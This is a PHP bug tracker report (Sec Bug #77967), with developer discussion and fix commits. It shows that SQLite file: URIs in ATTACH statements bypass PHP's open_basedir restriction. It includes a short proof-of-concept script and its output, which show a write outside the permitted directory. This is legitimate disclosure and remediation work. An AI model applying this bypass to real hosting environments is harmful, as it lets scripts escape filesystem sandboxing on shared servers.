PHP :: Sec Bug #77967 :: Bypassing open_basedir restrictions via file uris

Sec Bug #77967	Bypassing open_basedir restrictions via file uris
Submitted:	2019-05-04 10:04 UTC	Modified:	2019-05-28 04:36 UTC
From:	radimre83 at gmail dot com	Assigned:
Status:	Closed	Package:	SQLite related
PHP Version:	7.3.5	OS:	Linux
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	radimre83 at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2019-05-04 10:04 UTC] radimre83 at gmail dot com

Description:
------------
Sqlite supports the file: URI handler as part of the DSN string. https://sqlite.org/uri.html

This feature can be abused to bypass the open_basedir restriction configured for PHP.


Test script:
---------------
<?php
file_put_contents("/safe/test.txt", "shall work");
file_put_contents("/unsafe/test.txt", "shall be a warning due to openbasedir");


$db = new SQLite3("/safe/main.db", 0x00000002|0x00000004|0x00000040); // 0x40 is SQLITE_OPEN_URI

chdir("/safe"); // the current working dir must be one of the open basedirs
$db->exec("ATTACH 'file:/unsafe/poc.db' AS sdb;");
$db->exec("CREATE TABLE sdb.t (t TEXT)");
$db->exec("INSERT INTO sdb.t (t) VALUES ('foobar')");
$db->close();


Expected result:
----------------
root@fd7f809a8411:/# /build/php-7.3.5/sapi/cli/php -d open_basedir=/safe /repo-shared/sqlite/sqlite-attach.php

Warning: file_put_contents(): open_basedir restriction in effect. File(/unsafe/test.txt) is not within the allowed path(s): (/safe) in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: file_put_contents(/unsafe/test.txt): failed to open stream: Operation not permitted in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: SQLite3::exec(): not authorized in /repo-shared/sqlite/sqlite-attach.php on line 9

Warning: SQLite3::exec(): unknown database sdb in /repo-shared/sqlite/sqlite-attach.php on line 10

Warning: SQLite3::exec(): no such table: sdb.t in /repo-shared/sqlite/sqlite-attach.php on line 11

root@fd7f809a8411:/safe# ls -la /unsafe/
total 16
drwxr-xr-x  2 root root 4096 May  4 09:53 .
drwxr-xr-x 71 root root 4096 May  4 09:46 ..


Actual result:
--------------
root@fd7f809a8411:/# /build/php-7.3.5/sapi/cli/php -d open_basedir=/safe /repo-shared/sqlite/sqlite-attach.php

Warning: file_put_contents(): open_basedir restriction in effect. File(/unsafe/test.txt) is not within the allowed path(s): (/safe) in /repo-shared/sqlite/sqlite-attach.php on line 3

Warning: file_put_contents(/unsafe/test.txt): failed to open stream: Operation not permitted in /repo-shared/sqlite/sqlite-attach.php on line 3

root@fd7f809a8411:/safe# ls -la /unsafe/
total 16
drwxr-xr-x  2 root root 4096 May  4 09:53 .
drwxr-xr-x 71 root root 4096 May  4 09:46 ..
-rw-r--r--  1 root root 8192 May  4 09:53 poc.db

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2019-05-05 17:34 UTC] radimre83 at gmail dot com

-Type: Bug +Type: Security -Private report: No +Private report: Yes

[2019-05-05 17:34 UTC] radimre83 at gmail dot com

Changing bug type to Security.

[2019-05-06 00:46 UTC] stas@php.net

Since it happens inside SQLITE, I do not think PHP can do anything about it.

[2019-05-06 05:53 UTC] radimre83 at gmail dot com

"Since it happens inside SQLITE, I do not think PHP can do anything about it."

You already have an authorizer callback (sqlite3_set_authorizer) implemented, that calls php_check_open_basedir() with the parameter of the ATTACH statement. It could be improved to pay special attention to the file: prefix.

[2019-05-06 11:07 UTC] cmb@php.net

Indeed, PHP should either properly check openbase_dir in
php_sqlite3_authorizer(), or it should reject file URIs altogether
(they are not supported for SQLite3::open() anyway).

[2019-05-08 09:40 UTC] cmb@php.net

According to a recent discussion[1] on the internals mailing list,
this is likely not a security though.

[1] <http://news.php.net/php.internals/105606>

[2019-05-09 05:42 UTC] radimre83 at gmail dot com

I agree with the proposal, open_basedir shall be deprecated and then deco'ed eventually.
Until then, people will keep using it as a security feature, I'm afraid.

[2019-05-28 04:36 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c34895e837b50213c2bb201c612904342d2bd216
Log: Fix bug #77967 - Bypassing open_basedir restrictions via file uris

[2019-05-28 04:36 UTC] stas@php.net

-Status: Open +Status: Closed

[2019-05-28 07:07 UTC] cmb@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=d27b4824e667c5ed3eac9c16496777392eae5b03
Log: Fix bug #77967 - Bypassing open_basedir restrictions via file uris

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Tue Dec 03 17:01:29 2024 UTC